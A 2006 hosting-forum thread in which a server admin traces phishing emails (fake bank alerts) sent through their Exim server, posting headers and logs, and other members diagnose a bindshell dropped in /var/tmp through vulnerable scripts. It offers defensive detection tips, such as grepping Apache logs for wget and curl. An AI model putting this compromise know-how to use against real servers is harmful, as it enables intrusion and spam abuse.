Phishing Help

goodgirl

goodgirl

Verified User
Joined
Apr 27, 2005
Messages
59
Location
Wheatfield
I have a server that we have found phishing emails are going through. I did add a limit on outgoing email to help find which user account the emails were going through.

I have found this part out. I know it isn't the user but I'm not sure what to look for to find how they are sending them.

I did: locate formmail.pl and found nothing.

Here is the header:
-----------------------------------------
> > Return-Path: <[email protected]>
> > Delivered-To: [email protected]
> > Received: (qmail 19009 invoked from network); 3 Jan 2006 12:44:40 -0000
> > Received: from xuxa.iecc.com (208.31.42.42)
> > by mail.iecc.com with SMTP; 3 Jan 2006 12:44:40 -0000
> > Received: (qmail 11448 invoked from network); 3 Jan 2006 12:44:40 -0000
> > Received: from rdns-225-226.securedprivatenetwork.net (HELO
>server.dedicatedroute.com) (216.144.225.226)
> > by smtp.abuse.net with SMTP; 3 Jan 2006 12:44:39 -0000
> > Received: from [62.139.80.98] (helo=d-1ca4bacff9d64)
> > by server.dedicatedroute.com with esmtpa (Exim 4.50)
> > id 1Eu76J-0005PP-85; Wed, 04 Jan 2006 03:46:43 -0800
> > From: "Bank of America" <[email protected]>
> > Subject: Online Banking Alert (update your information)
> > To: [email protected]
> > Content-Type: text/html;iso-8859-1
> > Reply-To: [email protected]
> > Date: Tue, 3 Jan 2006 02:44:26 +0200
> > X-Priority: 3
> > X-Library: Indy 8.0.25
> > X-DCC-IECC-Metrics: tom.iecc.com 1107; Body=1 Fuz1=1 Fuz2=1

I will post part of the mainlog for exim in a few mins.
 
exim mainlog -----------------------------------

2006-01-04 16:49:48 1Et9aS-0000vh-4O failed to expand condition "${perl{check_limits}}" for lookuphost router: You (houseplag) have reach your daily email limit of 200 emails

2006-01-04 16:49:48 1Et9aS-0000vh-4O ** [email protected] F=<[email protected]>: Unrouteable address
2006-01-04 16:49:48 1EuJK8-0001L3-Si <= <> R=1Et9aS-0000vh-4O U=mail P=local S=4154 T="Mail delivery failed: returning message to sender" from <> for [email protected]
2006-01-04 16:49:48 1Et9aS-0000vh-4O Completed
2006-01-04 16:49:48 1EuJK8-0001L3-Si => jack <[email protected]> F=<> R=virtual_user T=virtual_localdelivery S=4297
2006-01-04 16:49:48 1EuJK8-0001L3-Si Completed
2006-01-04 16:49:48 1Et9uZ-0005Zs-H2 failed to expand condition "${perl{check_limits}}" for lookuphost router: You (houseplag) have reach your daily email limit of 200 emails

2006-01-04 16:49:48 1Et9uZ-0005Zs-H2 ** [email protected] F=<[email protected]>: Unrouteable address
2006-01-04 16:49:49 1EuJK8-0001LB-VK <= <> R=1Et9uZ-0005Zs-H2 U=mail P=local S=4149 T="Mail delivery failed: returning message to sender" from <> for [email protected]
2006-01-04 16:49:49 1Et9uZ-0005Zs-H2 Completed
2006-01-04 16:49:49 1EuJK8-0001LB-VK => jack <[email protected]> F=<> R=virtual_user T=virtual_localdelivery S=4292
2006-01-04 16:49:49 1EuJK8-0001LB-VK Completed
2006-01-04 16:49:50 1Et9AW-0005hr-83 failed to expand condition "${perl{check_limits}}" for lookuphost router: You (houseplag) have reach your daily email limit of 200 emails

2006-01-04 16:49:50 1Et9AW-0005hr-83 == [email protected] R=userforward defer (-1): failed to stat /etc/news/. (No such file or directory)
2006-01-04 16:49:51 1Et9hk-0002P8-4X failed to expand condition "${perl{check_limits}}" for lookuphost router: You (houseplag) have reach your daily email limit of 200 emails

2006-01-04 16:49:51 1Et9hk-0002P8-4X ** [email protected] F=<[email protected]>: Unrouteable address
2006-01-04 16:49:51 1EuJKB-0001xw-OH <= <> R=1Et9hk-0002P8-4X U=mail P=local S=4149 T="Mail delivery failed: returning message to sender" from <> for [email protected]
2006-01-04 16:49:51 1Et9hk-0002P8-4X Completed
2006-01-04 16:49:51 1EuJKB-0001xw-OH => jack <[email protected]> F=<> R=virtual_user T=virtual_localdelivery S=4292
2006-01-04 16:49:51 1EuJKB-0001xw-OH Completed
2006-01-04 16:49:51 1EtA3I-0007eV-2z failed to expand condition "${perl{check_limits}}" for lookuphost router: You (houseplag) have reach your daily email limit of 200 emails

2006-01-04 16:49:51 1EtA3I-0007eV-2z ** [email protected] F=<[email protected]>: Unrouteable address
2006-01-04 16:49:51 1EuJKB-0001yB-RW <= <> R=1EtA3I-0007eV-2z U=mail P=local S=4159 T="Mail delivery failed: returning message to sender" from <> for [email protected]
2006-01-04 16:49:51 1EtA3I-0007eV-2z Completed
2006-01-04 16:49:51 1EuJKB-0001yB-RW => jack <[email protected]> F=<> R=virtual_user T=virtual_localdelivery S=4302
2006-01-04 16:49:51 1EuJKB-0001yB-RW Completed
2006-01-04 16:49:51 1Et9oP-00046R-CV failed to expand condition "${perl{check_limits}}" for lookuphost router: You (houseplag) have reach your daily email limit of 200 emails

2006-01-04 16:49:51 1Et9oP-00046R-CV ** [email protected] F=<[email protected]>: Unrouteable address
2006-01-04 16:49:51 1EuJKB-0001yH-UE <= <> R=1Et9oP-00046R-CV U=mail P=local S=4143 T="Mail delivery failed: returning message to sender" from <> for [email protected]
2006-01-04 16:49:51 1Et9oP-00046R-CV Completed
2006-01-04 16:49:51 1EuJKB-0001yH-UE => jack <[email protected]> F=<> R=virtual_user T=virtual_localdelivery S=4286
 
Here is some of the log from before I put on the limit.


2006-01-01 11:31:07 1Et8v4-0003mh-Vm Completed
2006-01-01 11:31:07 1Et8v4-0003fC-Dc <= [email protected] H=(d-1ca4bacff9d64) [62.139.86.76] P=esmtpa A=login:[email protected] S=3308 T="Update Your Wells Fargo Accounts.." from <[email protected]> for [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]
2006-01-01 11:31:07 1Et8v3-0003fV-N6 SMTP error from remote mailer after initial connection: host mailhost.cityclub-ftw.com [208.254.104.2]: 421 cityclub.cityclub-ftw.com connection limit reached
2006-01-01 11:31:07 1Et8v3-0003fc-N9 => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3388 H=hoth.gcn.ou.edu [129.15.192.23] C="250 Ok: queued as 5F913740C4"
2006-01-01 11:31:07 1Et8uy-0003fV-2q => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3384 H=mx4.texoma.net [209.151.96.27] C="250 2.0.0 jBVKSMF2002183 Message accepted for delivery"
2006-01-01 11:31:07 1Et8us-0003fc-Or => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3384 H=mx1.mail.yahoo.com [67.28.113.11] C="250 ok dirdel"
2006-01-01 11:31:07 1Et8v3-0003fc-N9 => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3388 H=mx4.hotmail.com [65.54.244.104] C="250 <[email protected]> Queued mail for delivery"
2006-01-01 11:31:07 1Et8v3-0003fc-N9 ** [email protected] F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after RCPT TO:<[email protected]>: host mx4.hotmail.com [65.54.244.104]: 550 Requested action not taken: mailbox unavailable
2006-01-01 11:31:07 1Et8uy-0003fV-2q ** [email protected] F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after RCPT TO:<[email protected]>: host mx8.airmail.net [209.196.77.105]: 550 unrouteable address ([email protected]), check your spelling
2006-01-01 11:31:07 1Et8uy-0003fV-2q => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3384 H=mx2.hotmail.com [65.54.244.40] C="250 <[email protected]> Queued mail for delivery"
2006-01-01 11:31:07 1Et8v3-0003fU-UU => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3380 H=inmail.ev1.net [207.218.192.49] C="250 Message queued"
2006-01-01 11:31:08 1Et8v6-0003mx-1E <= <> H=mx4.texoma.net [209.151.96.27] P=esmtps X=TLSv1:AES256-SHA:256 S=5636 [email protected] T="Returned mail: see transcript for details" from <> for [email protected]
2006-01-01 11:31:08 1Et8v6-0003mx-1E => jack <[email protected]> F=<> R=virtual_user T=virtual_localdelivery S=5779
2006-01-01 11:31:08 1Et8v6-0003mx-1E Completed
2006-01-01 11:31:08 1Et8v3-0003fB-Ua ** [email protected] F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after end of data: host mailin-04.mx.aol.com [64.12.138.89]: 554-: (HVU:B1) http://postmaster.info.aol.com/errors/554hvub1.html\n554 TRANSACTION FAILED
2006-01-01 11:31:08 1Et8v3-0003fB-Ua ** [email protected] F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after end of data: host mailin-04.mx.aol.com [64.12.138.89]: 554-: (HVU:B1) http://postmaster.info.aol.com/errors/554hvub1.html\n554 TRANSACTION FAILED
2006-01-01 11:31:08 1Et8v3-0003fB-Ua => [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp S=3381 H=mail.wnj.org [208.14.30.33] C="250 2.0.0 XBVK1V8HT000013EC Message accepted for delivery"
2006-01-01 11:31:08 1Et8uy-0003fV-2q => [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp S=3384 H=clmboh-01.mgw.rr.com [65.24.7.13] C="250 ok: Message 998670843 accepted"
2006-01-01 11:31:08 1Et8v3-0003fV-N6 => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3390 H=mx-1.zoominternet.net [24.154.1.20] C="250 2.0.0 jBVKTDqG028107 Message accepted for delivery"
2006-01-01 11:31:08 1Et8v4-0003fC-Dc ** [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after end of data: host mailin-03.mx.aol.com [205.188.159.57]: 554-: (HVU:B1) http://postmaster.info.aol.com/errors/554hvub1.html\n554 TRANSACTION FAILED
2006-01-01 11:31:08 1Et8v4-0003fC-Dc ** [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after end of data: host mailin-03.mx.aol.com [205.188.159.57]: 554-: (HVU:B1) http://postmaster.info.aol.com/errors/554hvub1.html\n554 TRANSACTION FAILED
2006-01-01 11:31:08 1Et8us-0003fc-Or => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3384 H=mail17.commercestreet.com [168.75.239.17] C="250 Ok: queued as B435730F98"
2006-01-01 11:31:08 1Et8v3-0003fV-N6 => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3390 H=mx3.hotmail.com [65.54.244.72] C="250 <[email protected]> Queued mail for delivery"
2006-01-01 11:31:08 1Et8v3-0003fV-N6 -> [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3390 H=mx3.hotmail.com [65.54.244.72] C="250 <[email protected]> Queued mail for delivery"
2006-01-01 11:31:09 1Et8v3-0003fc-N9 ** [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after end of data: host mailin-04.mx.aol.com [205.188.156.249]: 554-: (HVU:B1) http://postmaster.info.aol.com/errors/554hvub1.html\n554 TRANSACTION FAILED
2006-01-01 11:31:09 1Et8v3-0003fc-N9 ** [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after end of data: host mailin-04.mx.aol.com [205.188.156.249]: 554-: (HVU:B1) http://postmaster.info.aol.com/errors/554hvub1.html\n554 TRANSACTION FAILED
2006-01-01 11:31:09 1Et8v3-0003fU-UU SMTP error from remote mailer after end of data: host mx3.mail.yahoo.com [64.156.215.18]: 451 mta342.mail.scd.yahoo.com Resources temporarily unavailable. Please try again later [#4.16.5].
2006-01-01 11:31:09 1Et8v3-0003fB-Ua => [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp S=3381 H=cluster6.us.messagelabs.com [216.82.254.67] X=TLSv1:AES256-SHA:256 C="250 ok 1136060952 qp 30916 server-19.tower-44.messagelabs.com!1136060951!17872638!1"
2006-01-01 11:31:09 1Et8un-0003fV-Jq => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3389 H=smtp.theaardvark.com [64.105.96.123] X=TLSv1:DES-CBC3-SHA:168 C="250 OK"
2006-01-01 11:31:09 1Et8un-0003fV-Jq -> [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3389 H=smtp.theaardvark.com [64.105.96.123] X=TLSv1:DES-CBC3-SHA:168 C="250 OK"
2006-01-01 11:31:09 1Et8v7-0003nG-EP <= <> R=1Et8un-0003fV-Jq U=mail P=local S=5202 T="Mail delivery failed: returning message to sender" from <> for [email protected]
2006-01-01 11:31:09 1Et8un-0003fV-Jq Completed
 
I'd be looking at vulnerable scripts on the server - and also checking the contents of /tmp and /var/tmp ... sounds like you might have a bindshell running

do a

ls-la /tmp

look for .x - anything with a . in the beginning is likely to be a bindshell
 
hostpc.com said:
I'd be looking at vulnerable scripts on the server - and also checking the contents of /tmp and /var/tmp ... sounds like you might have a bindshell running

do a

ls-la /tmp

look for .x - anything with a . in the beginning is likely to be a bindshell
Click to expand...

I only see one in the beginning of tmp
iroffer1.2b22

And then I see ls /var/tmp
1 bindshe.c


in the /var/tmp.
 
You appear to have been hacked.

The problem is that if you didn't recognize a file named bindshe.c as a evidence of a bindshell, in spite of the similarity of names, then you may not have the skills necessary to clean your server; you might want to hire a security firm or person to check out your server for you.

If you do, be sure to find someone you can trust. If you just post a request on a help forum you're shooting dice.

Jeff
 
I'm not sure if I'd define a bindshell as a "hack" per se... if I did, it'd be a pretty loose interpretation.

It could have been uploaded through any vulnerable script such as an un-updated awstats, phpBB, or a bizillion others out there (those are just two popular ones). Scouring through the apache log files for things like wget, curl, etc is a good start.

I agree, you should probably look to someone for help in cleaning up the server, and making sure that the tmp directories are only being used for what they're intended - that is, not for execution of perl or php scripts... just "temporary" storage, session files, etc. When you find someone to help you - ask to get notes on what they're doing so you can learn for the future and perhaps help yourself next time - or even better, help someone else who needs a hand.

Joe
 
And I agree with you, Joe, that I've been known to overuse the word hack.

For which I apologize.

If someone creates a bindshell on your server and uses it to send phishing emails perhaps the word compromised would be better.

Jeff
 
You must log in or register to reply here.
Back
Top